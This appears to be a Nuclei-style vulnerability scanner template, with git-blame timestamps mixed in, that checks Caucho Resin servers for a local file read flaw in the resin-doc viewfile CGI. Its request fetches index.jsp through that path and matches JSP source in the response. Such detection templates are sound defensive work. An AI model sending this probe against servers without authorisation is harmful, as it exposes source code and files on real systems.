2021-04-22 09:16:29 +00:00
id : resin-viewfile-lfr
2022-04-22 10:38:41 +00:00
2021-04-22 09:16:29 +00:00
info :
name : Caucho Resin LFR
author : princechaddha
severity : high
2022-04-22 10:38:41 +00:00
description : There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web,
including JSP source code or class files.
2021-08-18 11:37:49 +00:00
reference :
2021-04-22 09:16:29 +00:00
- http://0day5.com/archives/1173/
- https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
2021-04-22 13:43:46 +00:00
tags : resin,caucho,lfr
2021-04-22 09:16:29 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/resin-doc/viewfile/?file=index.jsp"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
part : body